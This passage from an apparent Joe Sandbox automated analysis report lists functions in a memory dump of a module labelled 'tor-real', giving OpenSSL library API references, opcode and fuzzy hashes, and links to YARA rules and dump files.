                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: X_free$D_lock_newL_sk_dupO_ctrlO_freeO_newO_zalloc
                                                                            • String ID: m
                                                                            • API String ID: 3678400241-3775001192
                                                                            • Opcode ID: 0c4b81ebe489e67cdaa8ccaf1a642ac9691086a8b12bf801303284e2ae60809c
                                                                            • Instruction ID: 644b9f9d067391c558253665849b0692b1fb1bb3f43a01285e986cb90df4d721
                                                                            • Opcode Fuzzy Hash: 0c4b81ebe489e67cdaa8ccaf1a642ac9691086a8b12bf801303284e2ae60809c
                                                                            • Instruction Fuzzy Hash: 5EF04FB06093068FD700AF65988435BBAE0AF8934CF01592DE8D497B02DB76E444DB93
                                                                            Function 6C0E88B8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 29COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • OPENSSL_cleanse.LIBCRYPTO-1_1 ref: 6C0E866E
                                                                              • Part of subcall function 6C0CA0C0: ERR_put_error.LIBCRYPTO-1_1 ref: 6C0CA0F4
                                                                            • EVP_CIPHER_CTX_new.LIBCRYPTO-1_1 ref: 6C0E88C0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: L_cleanseR_put_errorX_new
                                                                            • String ID: A$P
                                                                            • API String ID: 825340233-345673399
                                                                            • Opcode ID: 57bb1233ca5337e80f1c5d0ecd17151fdd92a4c6a2dcc888f4d4862967fa1886
                                                                            • Instruction ID: 3f537dbca07918f8827cb1f2e38cb6d0918828e8078c2e9efcf0da1acee5c94f
                                                                            • Opcode Fuzzy Hash: 57bb1233ca5337e80f1c5d0ecd17151fdd92a4c6a2dcc888f4d4862967fa1886
                                                                            • Instruction Fuzzy Hash: D4F01DB12483418FD310EF19D49079EB7E4AB85318F408D2DDA989B740D77995088F92
                                                                            Function 6C094068 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: strlen$L_sk_findL_sk_freeL_sk_pushR_put_errorstrchrstrncmp
                                                                            • String ID: ]
                                                                            • API String ID: 1493756383-3352871620
                                                                            • Opcode ID: 1a02713e168be257e85220cfbab43eb83507549ef7eea2a1932899ca0c104079
                                                                            • Instruction ID: 56451f2c90033e3ff61b3f8a63da4642c5c247fd0baee1867606fc031418523e
                                                                            • Opcode Fuzzy Hash: 1a02713e168be257e85220cfbab43eb83507549ef7eea2a1932899ca0c104079
                                                                            • Instruction Fuzzy Hash: 52F08CB6A087048FD3009F21D40438ABBF1FB89328F42481DD8EC57340C775A5498F86
                                                                            Function 6C0E08C8 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 20COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 6C0CA0C0: ERR_put_error.LIBCRYPTO-1_1 ref: 6C0CA0F4
                                                                            • EVP_PKEY_CTX_free.LIBCRYPTO-1_1 ref: 6C0E08B9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: R_put_errorX_free
                                                                            • String ID: 4$D$P
                                                                            • API String ID: 82304395-1354974332
                                                                            • Opcode ID: bd02b02c5054441829c877344d7f17f2e2379c8b4f26f06232a26bffc16add17
                                                                            • Instruction ID: ec1651e1f79fef5ebd459d6c9c81069f39042f98482eecada82692286e1a4194
                                                                            • Opcode Fuzzy Hash: bd02b02c5054441829c877344d7f17f2e2379c8b4f26f06232a26bffc16add17
                                                                            • Instruction Fuzzy Hash: 8BE012B22497648ED7009F94E94038EBBE0FB84759F10881EE28857640C77995088FD7
                                                                            Function 6C0A0DC0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 18COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: qsort
                                                                            • String ID: @
                                                                            • API String ID: 1928336220-2766056989
                                                                            • Opcode ID: c22018e81c25443374314daa21ab3d38c9f9e7c9302c912fb7596acea2cf0fb9
                                                                            • Instruction ID: a16993810bcb497f15e3e56de4faf4d283eddf3836a97efee5bc96a2df235160
                                                                            • Opcode Fuzzy Hash: c22018e81c25443374314daa21ab3d38c9f9e7c9302c912fb7596acea2cf0fb9
                                                                            • Instruction Fuzzy Hash: 12F028F5408384AAD300AF81C11635FBEE0BB81388F51C90CD5D81B665C7BA8489DF9B
                                                                            Function 6C0C0E23 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 72stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 6C095150: CRYPTO_zalloc.LIBCRYPTO-1_1 ref: 6C09517D
                                                                            • strlen.MSVCRT ref: 6C0C0EF1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: O_zallocstrlen
                                                                            • String ID: 6$D$P
                                                                            • API String ID: 3335338566-704845596
                                                                            • Opcode ID: b635cf2c837d5b24ef8563abcf4960a863f73439b1d55af742fb612b066b9207
                                                                            • Instruction ID: 8095f5377571494eab24e80b3eb9d4a89583f15cbd0d0c28a082a5051fff2fc2
                                                                            • Opcode Fuzzy Hash: b635cf2c837d5b24ef8563abcf4960a863f73439b1d55af742fb612b066b9207
                                                                            • Instruction Fuzzy Hash: 59213BB120D7119BE7009F29D58435FBBE4AF8479CF11881CE8948B740D779D889DB87
                                                                            Function 6C0A2A83 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • OPENSSL_sk_find.LIBCRYPTO-1_1 ref: 6C0A29F1
                                                                            • OPENSSL_sk_num.LIBCRYPTO-1_1 ref: 6C0A2A0E
                                                                            • OPENSSL_sk_value.LIBCRYPTO-1_1 ref: 6C0A2A22
                                                                            • OPENSSL_sk_value.LIBCRYPTO-1_1 ref: 6C0A2ADC
                                                                            • OPENSSL_sk_value.LIBCRYPTO-1_1 ref: 6C0A2B5B
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: L_sk_value$L_sk_findL_sk_num
                                                                            • String ID:
                                                                            • API String ID: 2454052373-0
                                                                            • Opcode ID: 50aa4614008e9a9877a36c4cecf8bde5f281216058e8ffcb27661a427e00e986
                                                                            • Instruction ID: 5de87969a9a9b813e2ca88b93a8397cbd4f16e074cf13618e8839558d682b05c
                                                                            • Opcode Fuzzy Hash: 50aa4614008e9a9877a36c4cecf8bde5f281216058e8ffcb27661a427e00e986
                                                                            • Instruction Fuzzy Hash: 5431D4706097418FC750DFAAC18471ABBE0BF88748F518A2DE89897A02D734E886CB46
                                                                            Function 6C0E2CE7 Relevance: 6.1, APIs: 4, Instructions: 58COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • EVP_PKEY_id.LIBCRYPTO-1_1 ref: 6C0E2CF3
                                                                            • EVP_PKEY_get0_EC_KEY.LIBCRYPTO-1_1 ref: 6C0E2D02
                                                                            • EC_KEY_get0_group.LIBCRYPTO-1_1 ref: 6C0E2D0E
                                                                            • EC_GROUP_get_curve_name.LIBCRYPTO-1_1 ref: 6C0E2D16
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: P_get_curve_nameY_get0_Y_get0_groupY_id
                                                                            • String ID:
                                                                            • API String ID: 1221970100-0
                                                                            • Opcode ID: a9961eee6877f33c67dcae106497b5073041ac5e2d2c13c446b317c3fa63028f
                                                                            • Instruction ID: 9227c07b8127bc22947e97c0945435e64242a997d266ccae5a2217cbc3395aab
                                                                            • Opcode Fuzzy Hash: a9961eee6877f33c67dcae106497b5073041ac5e2d2c13c446b317c3fa63028f
                                                                            • Instruction Fuzzy Hash: 8B11917068D707CEDF64AF24C5883AAB7E0AF4D348F954D2DCAA68BA50D734E485C781
                                                                            Function 6C0BA0E0 Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • d2i_X509.LIBCRYPTO-1_1 ref: 6C0BA100
                                                                            • X509_free.LIBCRYPTO-1_1 ref: 6C0BA146
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0BA17D
                                                                              • Part of subcall function 6C0B8500: X509_get0_pubkey.LIBCRYPTO-1_1 ref: 6C0B8518
                                                                              • Part of subcall function 6C0B8500: EVP_PKEY_copy_parameters.LIBCRYPTO-1_1 ref: 6C0B855E
                                                                              • Part of subcall function 6C0B8500: ERR_clear_error.LIBCRYPTO-1_1 ref: 6C0B8563
                                                                              • Part of subcall function 6C0B8500: X509_check_private_key.LIBCRYPTO-1_1 ref: 6C0B857A
                                                                              • Part of subcall function 6C0B8500: X509_free.LIBCRYPTO-1_1 ref: 6C0B8591
                                                                              • Part of subcall function 6C0B8500: X509_up_ref.LIBCRYPTO-1_1 ref: 6C0B8599
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0BA1B1
                                                                              • Part of subcall function 6C0E67A0: X509_get0_pubkey.LIBCRYPTO-1_1 ref: 6C0E6601
                                                                              • Part of subcall function 6C0E67A0: EVP_PKEY_security_bits.LIBCRYPTO-1_1 ref: 6C0E6616
                                                                              • Part of subcall function 6C0E67A0: X509_get_extension_flags.LIBCRYPTO-1_1 ref: 6C0E6657
                                                                              • Part of subcall function 6C0E67A0: X509_get_signature_info.LIBCRYPTO-1_1 ref: 6C0E668B
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: R_put_errorX509_freeX509_get0_pubkey$R_clear_errorX509X509_check_private_keyX509_get_extension_flagsX509_get_signature_infoX509_up_refY_copy_parametersY_security_bitsd2i_
                                                                            • String ID:
                                                                            • API String ID: 730711336-0
                                                                            • Opcode ID: 901590a64939aac9114697b0e5aa287a11c872bffb28514432c50d4bab552020
                                                                            • Instruction ID: 8e2031d819e452aeed2710a06aadc7926e1363942e98ea13cde5e819e08b0a37
                                                                            • Opcode Fuzzy Hash: 901590a64939aac9114697b0e5aa287a11c872bffb28514432c50d4bab552020
                                                                            • Instruction Fuzzy Hash: AD11F8B190D3519FD750DF24D48038FBBE0AB88758F118D2DE4D89B750D7B9D9888B92
                                                                            Function 6C0D8697 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • OPENSSL_sk_value.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C0D86A7
                                                                            • i2d_X509_NAME.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C0D86BD
                                                                              • Part of subcall function 6C094670: CRYPTO_zalloc.LIBCRYPTO-1_1 ref: 6C0946A1
                                                                            • i2d_X509_NAME.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C0D86F7
                                                                            • OPENSSL_sk_num.LIBCRYPTO-1_1(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C0D8706
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: X509_i2d_$L_sk_numL_sk_valueO_zalloc
                                                                            • String ID:
                                                                            • API String ID: 1323314405-0
                                                                            • Opcode ID: 54f90a45c576b4129db7faa9308d602b887616d54a1797f927e6b88d6afc7751
                                                                            • Instruction ID: 7024ffafd3bf40eb35762f5713b333e40992d69246cfef7326179724eac12129
                                                                            • Opcode Fuzzy Hash: 54f90a45c576b4129db7faa9308d602b887616d54a1797f927e6b88d6afc7751
                                                                            • Instruction Fuzzy Hash: CD115BB16097019FD700AF65C48036EBBF4AF88398F425A2EE8D8D7700E734E5849B83
                                                                            Function 6C0A2B33 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • OPENSSL_sk_find.LIBCRYPTO-1_1 ref: 6C0A29F1
                                                                            • OPENSSL_sk_num.LIBCRYPTO-1_1 ref: 6C0A2A0E
                                                                            • OPENSSL_sk_value.LIBCRYPTO-1_1 ref: 6C0A2A22
                                                                            • OPENSSL_sk_value.LIBCRYPTO-1_1 ref: 6C0A2ADC
                                                                            • OPENSSL_sk_value.LIBCRYPTO-1_1 ref: 6C0A2B5B
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: L_sk_value$L_sk_findL_sk_num
                                                                            • String ID:
                                                                            • API String ID: 2454052373-0
                                                                            • Opcode ID: 560e38f106cc058aeb548ed13820229052159dfce215bf50a70c14d2a792b280
                                                                            • Instruction ID: 823111581c965746f3e2115f012921ca9a18481dbb2ed9f582e2331f02df4ce7
                                                                            • Opcode Fuzzy Hash: 560e38f106cc058aeb548ed13820229052159dfce215bf50a70c14d2a792b280
                                                                            • Instruction Fuzzy Hash: D9110D706097418FC315DFA6C18476ABBF1BF89708F654A6DE49997A02D334E886CB06
                                                                            Function 6C0BA870 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • d2i_PrivateKey.LIBCRYPTO-1_1 ref: 6C0BA8AB
                                                                            • ERR_put_error.LIBCRYPTO-1_1 ref: 6C0BA911
                                                                              • Part of subcall function 6C0B86D0: X509_get0_pubkey.LIBCRYPTO-1_1 ref: 6C0B870E
                                                                              • Part of subcall function 6C0B86D0: EVP_PKEY_copy_parameters.LIBCRYPTO-1_1 ref: 6C0B8722
                                                                              • Part of subcall function 6C0B86D0: ERR_clear_error.LIBCRYPTO-1_1 ref: 6C0B8727
                                                                              • Part of subcall function 6C0B86D0: X509_check_private_key.LIBCRYPTO-1_1 ref: 6C0B873E
                                                                              • Part of subcall function 6C0B86D0: EVP_PKEY_free.LIBCRYPTO-1_1 ref: 6C0B8755
                                                                              • Part of subcall function 6C0B86D0: EVP_PKEY_up_ref.LIBCRYPTO-1_1 ref: 6C0B875D
                                                                            • EVP_PKEY_free.LIBCRYPTO-1_1 ref: 6C0BA8C8
                                                                            Memory Dump Source
                                                                            • Source File: 00000019.00000002.4516530618.000000006C091000.00000020.00000001.01000000.00000011.sdmp, Offset: 6C090000, based on PE: true
                                                                            • Associated: 00000019.00000002.4516270780.000000006C090000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4516970225.000000006C0F2000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517161020.000000006C0F5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517386933.000000006C107000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517516397.000000006C108000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517666400.000000006C10D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C10E000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4517746514.000000006C113000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                            • Associated: 00000019.00000002.4518009298.000000006C114000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_25_2_6c090000_tor-real.jbxd
                                                                            Similarity
                                                                            • API ID: Y_free$PrivateR_clear_errorR_put_errorX509_check_private_keyX509_get0_pubkeyY_copy_parametersY_up_refd2i_
                                                                            • String ID:
                                                                            • API String ID: 1926251844-0
                                                                            • Opcode ID: d6043d2c036a6b78d5dc488f2183ba04b5212305c76b35c64b0a31035dfd0988
                                                                            • Instruction ID: f2b1f20fb9f0b03ebd94aaa9bd710c5e87d7ace9d00360431744691ec06c89f9
                                                                            • Opcode Fuzzy Hash: d6043d2c036a6b78d5dc488f2183ba04b5212305c76b35c64b0a31035dfd0988
                                                                            • Instruction Fuzzy Hash: 9711E2B1A183018FC710EF69C48074BBBF0BB89358F51892DE898A7710E735E9458F92
                                                                            Function 6C0920EC Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • BIO_find_type.LIBCRYPTO-1_1 ref: 6C092104
                                                                            • BIO_find_type.LIBCRYPTO-1_1 ref: 6C09211A
                                                                            • BIO_get_data.LIBCRYPTO-1_1 ref: 6C09212C
                                                                            • BIO_get_data.LIBCRYPTO-1_1 ref: 6C092136
